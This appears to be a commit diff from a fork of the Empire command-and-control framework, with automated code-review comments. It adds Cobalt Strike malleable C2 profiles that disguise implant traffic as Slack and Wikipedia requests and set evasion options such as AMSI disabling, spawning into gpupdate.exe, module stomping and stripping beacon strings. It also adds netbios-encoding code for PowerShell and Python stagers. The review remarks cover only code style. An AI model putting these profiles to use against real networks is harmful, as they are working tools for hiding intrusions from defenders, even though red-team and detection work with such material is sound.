define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
653 # print;
654 # }
655 # }
656 # }
657
658 ## CS 4.0 Profile Variants
659 ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other.
660 ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax:
661 ## [block name] "variant name" { ... }. Here's a variant http-get block named "My Variant":
662 ## http-get "My Variant" {
663 ## client {
664 ## parameter "bar" "blah";
665
0 #slack profile
1 #used a MS dev group from a 'top slack groups' list
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10
11 #custom cert
12 #https-certificate {
13 # set keystore "your_store_file.store";
14 # set password "your_store_pass";
15 #}
16
17 http-config {
18 # set headers "Server, Content-Type, Cache-Control, Connection";
19 # header "Content-Type" "text/html;charset=UTF-8";
20 # header "Connection" "close";
21 # header "Cache-Control" "max-age=2";
22 # header "Server" "nginx";
23 #set "true" if teamserver is behind redirector
24 set trust_x_forwarded_for "false";
25 }
26
27 http-get {
28
29 set uri "/messages/C0527B0NM";
30
31 client {
32
33 # header "Host" "msdevchat.slack.com";
34 header "Accept" "*/*";
35 header "Accept-Language" "en-US";
36 header "Connection" "close";
37
38
39 metadata {
40 base64url;
41
42 append ";_ga=GA1.2.875";
43 append ";__ar_v4=%8867UMDGS643";
44 prepend "d=";
45 # prepend "cvo_sid1=R456BNMD64;";
46 prepend "_ga=GA1.2.875;";
47 prepend "b=.12vPkW22o;";
48 header "Cookie";
49
50 }
51
52 }
53
54 server {
55
56 header "Content-Type" "text/html; charset=utf-8";
57 header "Connection" "close";
58 header "Server" "Apache";
59 header "X-XSS-Protection" "0";
60 header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
61 header "Referrer-Policy" "no-referrer";
62 header "X-Slack-Backend" "h";
63 header "Pragma" "no-cache";
64 header "Cache-Control" "private, no-cache, no-store, must-revalidate";
65 header "X-Frame-Options" "SAMEORIGIN";
66 header "Vary" "Accept-Encoding";
67 header "X-Via" "haproxy-www-w6k7";
68
69
70 output {
71
72 base64url;
73
74 prepend "<!DOCTYPE html>
75 <html lang=\"en-US\" class=\"supports_custom_scrollbar\">
76
77 <head>
78
79 <meta charset=\"utf-8\">
80 <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">
81 <meta name=\"referrer\" content=\"no-referrer\">
82 <meta name=\"superfish\" content=\"nofish\">
83 <title>Microsoft Developer Chat Slack</title>
84 <meta name=\"author\" content=\"Slack\">
85
86
87 <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";
88
89 append "\"> </script>";
90
91 append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">
92
93
94 <div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">
95 <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>
96
97 <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">
98 Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>
99 </div>
100
101 <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">
102 We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\">
103 <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •
104 <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •
105 <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>
106 </span>
107 </div>";
108
109 print;
110 }
111 }
112 }
113
114 http-post {
115
116 set uri "/api/api.test";
117
118 client {
119
120 # header "Host" "msdevchat.slack.com";
121 header "Accept" "*/*";
122 header "Accept-Language" "en-US";
123
124 output {
125 base64url;
126
127 append ";_ga=GA1.2.875";
128 append "__ar_v4=%8867UMDGS643";
129 prepend "d=";
130 # prepend "cvo_sid1=R456BNMD64;";
131 prepend "_ga=GA1.2.875;";
132 prepend "b=.12vPkW22o;";
133 header "Cookie";
134
135
136 }
137
138
139 id {
140 #not sure on this, just trying to blend it in.
141 base64url;
142 prepend "GA1.";
143 header "_ga";
144
145 }
146 }
147
148 server {
149
150 header "Content-Type" "application/json; charset=utf-8";
151 header "Connection" "close";
152 header "Server" "Apache";
153 header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
154 header "Referrer-Policy" "no-referrer";
155 header "X-Content-Type-Options" "nosniff";
156 header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
157 header "X-XSS-Protection" "0";
158 header "X-Slack-Backend" "h";
159 header "Vary" "Accept-Encoding";
160 header "Access-Control-Allow-Origin" "*";
161 header "X-Via" "haproxy-www-6g1x";
162
163
164 output {
165 base64;
166
167 prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
168 append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
169
170 print;
171 }
172 }
173 }
174
175 http-stager {
176
177 set uri_x86 "/messages/DALBNSf25";
178 set uri_x64 "/messages/DALBNSF25";
179
180 client {
181 header "Accept" "*/*";
182 header "Accept-Language" "en-US,en;q=0.5";
183 header "Accept-Encoding" "gzip, deflate";
184 header "Connection" "close";
185 }
186
187 server {
188 header "Content-Type" "text/html; charset=utf-8";
189 header "Connection" "close";
190 header "Server" "Apache";
191 header "X-XSS-Protection" "0";
192 header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
193 header "Referrer-Policy" "no-referrer";
194 header "X-Slack-Backend" "h";
195 header "Pragma" "no-cache";
196 header "Cache-Control" "private, no-cache, no-store, must-revalidate";
197 header "X-Frame-Options" "SAMEORIGIN";
198 header "Vary" "Accept-Encoding";
199 header "X-Via" "haproxy-www-suhx";
200
201 }
202
203
204 }
205
206 ###Malleable PE Options###
207
208 post-ex {
209
210 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
211 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
212
213 set obfuscate "true";
214
215 set smartinject "true";
216
217 set amsi_disable "true";
218
219 }
220
221 #used peclone on wwanmm.dll.
222 #don't use 'set image_size_xx' if using 'set module_xx'
223 stage {
224 set checksum "0";
225 set compile_time "25 Oct 2016 01:57:23";
226 set entry_point "170000";
227 # set image_size_x86 "6586368";
228 # set image_size_x64 "6586368";
229 # set name "WWanMM.dll";
230 set userwx "false";
231 set cleanup "true";
232 set stomppe "true";
233 set obfuscate "true";
234 set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
235
236
237 #module stomp
238
239 #don't use 'set image_size_xx' if using 'set module_xx'
240 set module_x86 "wwanmm.dll";
241 set module_x64 "wwanmm.dll";
242
243 transform-x86 {
244 prepend "\x90\x90\x90";
245 strrep "ReflectiveLoader" "";
246 strrep "beacon.dll" "";
247 }
248
249 transform-x64 {
250 prepend "\x90\x90\x90";
251 strrep "ReflectiveLoader" "";
252 strrep "beacon.x64.dll" "";
253 }
254
255 }
256 process-inject {
257
258 set allocator "NtMapViewOfSection";
259
260 set min_alloc "16700";
261
262 set userwx "false";
263
264 set startrwx "true";
265
266 transform-x86 {
267 prepend "\x90\x90\x90";
268 }
269 transform-x64 {
270 prepend "\x90\x90\x90";
271 }
272
273 execute {
274 CreateThread "ntdll!RtlUserThreadStart";
275 CreateThread;
276 NtQueueApcThread;
277 CreateRemoteThread;
278 RtlCreateUserThread;
279 }
280 }
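Review bot: The file header (lines 0–2) records only a handle, `#xx0hcd`, and no source repository, revision or licence, although the README section in this same commit credits the third-party collections these profiles are taken from; a provenance line such as `# Source: <collection repo URL> @ <upstream commit> (licence: <licence>)` would keep this vendored copy traceable and auditable. The comment `#not sure on this, just trying to blend it in.` on the http-post id block (line 140) ships an unresolved uncertainty in configuration; either confirm the block and drop the remark, or rewrite it as `# TODO: confirm the id block is accepted by the listener` so it is tracked. It is not visible here whether Empire's profile loader honours the Cobalt Strike-specific post-ex, stage and process-inject blocks (lines 208–280); a one-line header comment stating which blocks the listener actually consumes would stop readers assuming those settings are in effect.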
0 #
1 # Wikipedia
2 #
3 # Author: @bluscreenofjeff
4 #
5
6 #set https cert info
7 https-certificate {
8 set CN "*.wikipedia.org"; #Common Name
9 set C "US"; #Country
10 set L "San Francisco"; #Locality
11 set OU "Wikimedia Foundation Inc"; #Organizational Unit Name
12 set ST "CA"; #State or Province
13 set validity "365"; #Number of days the cert is valid for
14 }
15
16 #default Beacon sleep duration and jitter
17 set sleeptime "60000";
18 set jitter "20";
19
20 #default useragent for HTTP comms
21 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
22
23 #IP address used to indicate no tasks are available to DNS Beacon
24 set dns_idle "8.8.4.4";
25
26 #Force a sleep prior to each individual DNS request. (in milliseconds)
27 set dns_sleep "0";
28
29 #Maximum length of hostname when uploading data over DNS (0-255)
30 set maxdns "235";
31
32 http-get {
33
34 set uri "/w/index.php";
35
36 client {
37
38 header "Host" "en.wikipedia.org";
39 header "Accept" "text/html,application/xhtml+xml,application/xml;";
40 header "Referer" "https://en.wikipedia.org/wiki/Main_Page";
41
42 #session metadata
43 metadata {
44 base64url;
45 parameter "search";
46 }
47 parameter "title" "Special%3ASearch";
48 parameter "go" "Go";
49 }
50
51
52 server {
53
54 header "Server" "mw1178.eqiad.wmnet";
55 header "X-Powered-By" "HHVM/3.12.7";
56 header "X-Content-Type-Options" "nosniff";
57 header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info.";
58 header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization";
59
60 #Beacon's tasks
61 output {
62 netbios;
63 prepend "<!DOCTYPE html><html class=client-nojs lang=en dir=ltr><head><meta charset=UTF-8/><title>Wikipedia</title><script>document.documentElement.className = document.documentElement.className.replace( /(^|s)client-nojs(s|$)/, $1client-js$2 );</script><script>(window.RLQ=window.RLQ||[]).push(function(){mw.config.set({wgCanonicalNamespace:,wgCanonicalSpecialPageName:false,wgNamespaceNumber:0,,wgBetaFeaturesFeatures:[],wgMediaViewerOnClick:true,wgMediaViewerEnabledByDefault:true,wgVisualEditor:{pageLanguageCode:en,pageLanguageDir:ltr,usePageImages:true,usePageDescriptions:true},wgPreferredVariant:en,wgMFDisplayWikibaseDescriptions:{search:true,nearby:true,watchlist:true,tagline:false},wgRelatedArticles:null,wgRelatedArticlesUseCirrusSearch:true,wgRelatedArticlesOnlyUseCirrusSearch:false,wgULSCurrentAutonym:English,wgNoticeProject:wikipedia,wgCentralNoticeCookiesToDelete:[],wgCentralNoticeCategoriesUsingLegacy:[Fundraising,fundraising],wgCategoryTreePageCategoryOptions:{mode:0,hideprefix:20,showcount:true,namespaces:false},wgWikibaseItemId:";
64
65 append ",wgCentralAuthMobileDomain:false,wgVisualEditorToolbarScrollOffset:0,wgEditSubmitButtonLabelPublish:false});mw.loader.state({ext.globalCssJs.user.styles:ready,ext.globalCssJs.site.styles:ready,site.styles:ready,noscript:ready,user.styles:ready,user:ready,user.options:loading,user.tokens:loading,wikibase.client.init:ready,ext.visualEditor.desktopArticleTarget.noscript:ready,ext.uls.interlanguage:ready,ext.wikimediaBadges:ready,mediawiki.legacy.shared:ready,mediawiki.legacy.commonPrint:ready,mediawiki.sectionAnchor:ready,mediawiki.skinning.interface:ready,skins.vector.styles:ready,ext.globalCssJs.user:ready,ext.globalCssJs.site:ready});mw.loader.implement(user.options@0j3lz3q,function($,jQuery,require,module){mw.user.options.set({variant:en});});mw.loader.implement(user.tokens@1dqfd7l,function ( $, jQuery, require, module )</script><link rel=stylesheet href=/w/load.php?debug=false&amp;lang=en&amp;modules=ext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cmediawiki.legacy.commonPrint%2Cshared%7Cmediawiki.sectionAnchor%7Cmediawiki.skinning.interface%7Cskins.vector.styles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector/><script async= src=/w/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector></script><meta name=ResourceLoaderDynamicStyles content=/><link rel=stylesheet href=/w/load.php?debug=false&amp;lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector/>";
66
67 print;
68 }
69 }
70 }
71
72 http-post {
73
74 set uri "/wiki";
75 set verb "GET";
76
77 client {
78
79 header "Host" "en.wikipedia.org";
80 header "Accept" "text/html,application/xhtml+xml,application/xml;";
81
82 #session ID
83 id {
84 base64url;
85 prepend "/";
86 uri-append;
87 }
88
89
90 #Beacon's responses
91 output {
92 base64url;
93 prepend "https://en.wikipedia.org/w/index.php?search=";
94 append "&title=Special%3ASearch&go=Go";
95 header "Referer";
96 }
97 }
98
99 server {
100
101 header "Server" "mw1178.eqiad.wmnet";
102 header "X-Powered-By" "HHVM/3.12.7";
103 header "X-Content-Type-Options" "nosniff";
104 header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info.";
105 header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization";
106
107 #empty
108 output {
109
110 prepend "<body class=mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject page-Test rootpage-Test skin-vector action-view><div id=mw-page-base class=noprint></div><div id=mw-head-base class=noprint></div><div id=content class=mw-body role=main><a id=top></a><div id=siteNotice><!-- CentralNotice --></div><div class=mw-indicators><div id=mw-indicator-pp-default class=mw-indicator><a href=/wiki/Wikipedia:Protection_policy#semi title=This article is semi-protected due to vandalism><img alt=Page semi-protected src=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/20px-Padlock-silver.svg.png width=20 height=20 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/30px-Padlock-silver.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/40px-Padlock-silver.svg.png 2x data-file-width=128 data-file-height=128 /></a></div></div><h1 id=firstHeading class=firstHeading lang=en>Wikipedia</h1><div id=bodyContent class=mw-body-content><div id=siteSub>From Wikipedia, the free encyclopedia</div><div id=contentSub><span class=mw-redirectedfrom>ᅡᅠᅡᅠ(Redirected from <a href=/w/index.php?title=Testing&amp;redirect=no class=mw-redirect title=Testing>Testing</a>)</span></div><div id=jump-to-nav class=mw-jump>Jump to:<a href=#mw-head>navigation</a>,<a href=#p-search>search</a></div><div id=mw-content-text lang=en dir=ltr class=mw-content-ltr><script>function mfTempOpenSection(id){var block=document.getElementById(mf-section-+id);block.className+= open-block;block.previousSibling.className+= open-block;}</script><table class=plainlinks metadata ambox ambox-content role=presentation><tr><td class=mbox-image><div style=width:52px><img alt= src=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/50px-Sandbox_Not.svg.png width=50 height=50 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/75px-Sandbox_Not.svg.png 1.5x, 
//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/100px-Sandbox_Not.svg.png 2x data-file-width=766 data-file-height=766 /></div></td>";
111
112 print;
113 }
114 }
115 }
116
117 #change the stager server
118 http-stager {
119 server {
120 header "Content-Type" "text/html";
121 }
122 }
1414 - [threatexpress](https://github.com/threatexpress/malleable-c2)
1515 - [yeyintminthuhtut](https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection)
1616 - [bluscreenofjeff](https://github.com/bluscreenofjeff/MalleableC2Profiles)
17 - [skgray](https://github.com//Malleable-C2)
1817 - [mhaskar](https://github.com/mhaskar/MalleableC2-Profiles)
1918
2019 ## Documentation
2120 - [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
22 - [Malleable C2 Documenation](https://www.cobaltstrike.com/help-malleable-c2)
21 - [Malleable C2 Documentation](https://www.cobaltstrike.com/help-malleable-c2)
22 - [Empire: Malleable C2 Profiles](https://www.bc-security.org/post/empire-malleable-c2-profiles/)
1818 from datetime import datetime, timezone
1919 from flask_socketio import SocketIO
2020
21 VERSION = "3.7.1 BC Security Fork"
21 VERSION = "3.7.2 BC Security Fork"
2222
2323 from pydispatch import dispatcher
2424
271271 netbios algorithm."""
272272 self.transform = lambda data: netbios_transform(data)
273273 self.transform_r = lambda data: netbios_transform_r(data)
274 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var}
275 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
276 self.generate_powershell = lambda var: netbios_powershell(var)
277 self.generate_powershell_r = lambda var: netbios_powershell_r(var)
274278
275279 def netbios_transform(data):
276280 if isinstance(data, str):
284288 r = "".join([chr(((data[i]-0x61)<<4)|((data[i+1]-0x61)&0xF)) for i in range(0, len(data), 2)])
285289 return r.encode('latin-1')
286290
287 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var}
288 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
289 self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+97;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+97;}));" % {"var":var}
290 self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-97) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-97) -band 15);}));" % {"var":var}
291 def netbios_powershell(var):
292 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+97;($data2[$i] -band 15)+97;}));" % {"var": var}
293
294 def netbios_powershell_r(var):
295 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-97 -shl 4) -bor ($data2[$i+1]-97 -band 15);}));" % {"var":var}
291296
292297 def _netbiosu(self):
293298 """Configure the `netbiosu` Transform, which encodes an arbitrary input using the upper-case
294299 netbios algorithm."""
295 self.transform = lambda data: netbios_transform(data)
296 self.transform_r = lambda data: netbios_transform_r(data)
297
298 def netbios_transform(data):
300 self.transform = lambda data: netbiosu_transform(data)
301 self.transform_r = lambda data: netbiosu_transform_r(data)
302 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var}
303 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
304 self.generate_powershell = lambda var: netbiosu_powershell(var)
305 self.generate_powershell_r = lambda var: netbiosu_powershell_r(var)
306
307 def netbiosu_transform(data):
299308 if isinstance(data, str):
300309 data = data.encode('latin-1')
301310 r = "".join([chr((c>>4)+0x41)+chr((c&0xF)+0x41) for c in data])
302311 return r.encode('latin-1')
303312
304 def netbios_transform_r(data):
313 def netbiosu_transform_r(data):
305314 if isinstance(data, str):
306315 data = data.encode('latin-1')
307316 r = "".join([chr(((data[i]-0x41)<<4)|((data[i+1]-0x41)&0xF)) for i in range(0, len(data), 2)])
308317 return r.encode('latin-1')
309318
310 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var}
311 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
312 self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+65;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+65;}));" % {"var":var}
313 self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-65) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-65) -band 15);}));" % {"var":var}
319 def netbiosu_powershell(var):
320 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+65;($data2[$i] -band 15)+65;}));" % {"var":var}
321
322 def netbiosu_powershell_r(var):
323 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-65 -shl 4) -bor ($data2[$i+1]-65 -band 15);}));" % {"var":var}
314324
315325 def _prepend(self, string):
316326 """Configure the `prepend` Transform, which prepends a static string to an arbitrary input.
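Review bot: `netbios_powershell_r` and `netbiosu_powershell_r` drop the grouping parentheses the replaced lambdas carried, so the emitted expression `($data2[$i]-97 -shl 4) -bor ($data2[$i+1]-97 -band 15)` now depends on PowerShell binding `-` more tightly than `-shl`, `-band` and `-bor`; writing it as `(($data2[$i]-97) -shl 4) -bor (($data2[$i+1]-97) -band 15)` (and the 65 form in the upper-case variant) keeps the intent readable without leaning on precedence. The four nested helpers added to `_netbios` and `_netbiosu`, and the two `generate_python` strings, are identical except for the 0x61/0x41 (97/65) alphabet offset, so one module-level helper taking the offset as a parameter would remove the duplicated logic. The reverse transforms still index `data[i+1]` without checking that the input has even length and stays within the a-p / A-P alphabet, so a malformed body raises IndexError or ValueError instead of a descriptive error — worth either a guard or a docstring line stating the precondition. The `_netbios` method starts outside the hunk.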
485485
486486 if redirectListenerOptions:
487487
488 self.options['RedirectStagingKey']['Value'] = redirectListenerOptions['StagingKey']['Value']
489 self.options['DefaultProfile']['Value'] = redirectListenerOptions['DefaultProfile']['Value']
490 redirectHost = redirectListenerOptions['Host']['Value']
488 self.options['RedirectStagingKey']['Value'] = redirectListenerOptions.options['StagingKey']['Value']
489 self.options['DefaultProfile']['Value'] = redirectListenerOptions.options['DefaultProfile']['Value']
490 redirectHost = redirectListenerOptions.options['Host']['Value']
491491
492492 uris = [a for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
493493
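Review bot: `redirectListenerOptions` now holds a listener object rather than its options dict (the new lines 488-490 read `.options[...]`), so the name is misleading both there and at the `if redirectListenerOptions:` guard above; renaming it to `redirectListener`, or adding `# a listener object; its option dict is .options`, would make the change self-explanatory. The three lookups also raise KeyError if the redirect listener lacks `StagingKey`, `DefaultProfile` or `Host`, which the truthiness guard does not cover, so a `.get` with a clear error message would surface that failure instead of a traceback. The enclosing method starts and ends outside the hunk.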
886886 getTask += "$data = [System.Text.Encoding]::Default.GetString($data);"
887887
888888 # ==== INTERPRET RESULTS ====
889 getTask += profile.get.server.output.generate_powershell_r("$data");
889 getTask += profile.get.server.output.generate_powershell_r("$data")
890890 getTask += "$data = [System.Text.Encoding]::Default.GetBytes($data);"
891891
892892 # ==== RETURN RESULTS ====